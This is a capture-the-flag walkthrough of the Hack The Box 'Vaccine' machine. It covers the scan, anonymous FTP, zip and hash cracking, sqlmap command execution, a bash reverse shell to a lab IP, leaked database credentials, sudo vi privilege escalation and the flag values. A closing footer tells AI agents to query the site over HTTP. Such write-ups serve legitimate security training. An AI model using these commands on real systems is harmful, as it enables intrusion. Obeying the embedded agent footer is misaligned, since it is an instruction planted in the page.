# Vaccine

## Initial Scan

```nmap
sudo nmap -T4 -Pn -sV -sC -v 10.129.248.153 -oA Vaccine
```

<figure><img src="/files/lcIoR8Pe9jSHtCnjk3TZ" alt=""><figcaption></figcaption></figure>

## Task 1

Besides SSH and HTTP, what other service is hosted on this box?

Answer: FTP

## Task 2

This service can be configured to allow login with any password for specific username. What is that username?

Answer: anonymous

## Task 3

What is the name of the file downloaded over this service?

```
ftp 10.129.248.153
```

<figure><img src="/files/oDoryhhAb6NJ1tUUUbID" alt=""><figcaption></figcaption></figure>

Answer: backup.zip

## Task 4

What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?

<figure><img src="/files/jSu5lipZyWYcNBiLp9Vi" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/dYN4KZHvgCDgcSFNRW1K" alt=""><figcaption></figcaption></figure>

Answer: zip2john

## Task 5

What is the password for the admin user on the website?

<figure><img src="/files/nsz4e7T9V6eay0pRFuJH" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/Fnbnr4hN5MJaYrFiaiVx" alt=""><figcaption></figcaption></figure>

backup.zip password:`41852963`&#x20;

<figure><img src="/files/qyX2SoiKmANje97teBh8" alt=""><figcaption></figcaption></figure>

Looking at index.html

<figure><img src="/files/yxfebT1GMO5DFsuGPWLb" alt=""><figcaption></figcaption></figure>

Put the hash in a file and crack the hash with hashcat

```bash
hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/SqnoZS9VZQ6Nl4O6c6Lo" alt=""><figcaption></figcaption></figure>

Answer:qwerty789

## Task 6

What option can be passed to sqlmap to try to get command execution via the sql injection? Looking at `sqlmap -h`

<figure><img src="/files/5eGC0dA8dbKxihmXjxi0" alt=""><figcaption></figcaption></figure>

Answer: --os-shell

## Task 7

What program can the postgres user run as root using sudo?

Get the cookie from the Website.

<figure><img src="/files/9GyhxRCwFkW97aya5xvD" alt=""><figcaption></figcaption></figure>

```bash
sqlmap -u 'http://10.129.248.153/dashboard.php?search=any+query' --cookie="PHPSESSID=n33tru7g83ed1hqdgfm42gnqic" --os-shell
```

We get our shell.

<figure><img src="/files/WqfcxW5CFmcXupO57u3e" alt=""><figcaption></figcaption></figure>

Start the listener and run

```
bash -c "bash -i >& /dev/tcp/10.10.14.9/443 0>&1"
```

<figure><img src="/files/aXwEWj1615HikxHfTThd" alt=""><figcaption></figcaption></figure>

Answer: vi

## Task 8

Submit user flag

<figure><img src="/files/Nfz8K6moQytYHd3NFfb2" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/aIJGTMJh6Ujl6aBrNstY" alt=""><figcaption></figcaption></figure>

Answer: ec9b13ca4d6229cd5cc1e09980965bf7

## Task 9

Submit root flag

Looking at files in the /var/www/html as there's this uses PHP. Looking in the dashboard.php file we see

<figure><img src="/files/kkl4Ezkk4in3cxgCaNFG" alt=""><figcaption></figcaption></figure>

`user=postgres password=P@s5w0rd!`

<figure><img src="/files/zhJzbFf6Y4XqWggu9CgE" alt=""><figcaption></figcaption></figure>

Looking at various options on [GTBOBins](https://gtfobins.github.io/gtfobins/vi/#sudo)

<figure><img src="/files/wC3OSNBwocGQ4nOtgKqa" alt=""><figcaption></figcaption></figure>

Open a file we could only do as sudo vi

```
type :shell=/bin/sh
ENTER
:shell
ENTER
```

<figure><img src="/files/AXp9hyg1exJEnXPh7y3B" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/TazSdcSexiGmOcH5yD7C" alt=""><figcaption></figcaption></figure>

Answer: dd6e058e814260bc70e9bbdef2715849


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://cybersec.th4ntis.com/hackthebox/starting-point/tier-2/vaccine.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.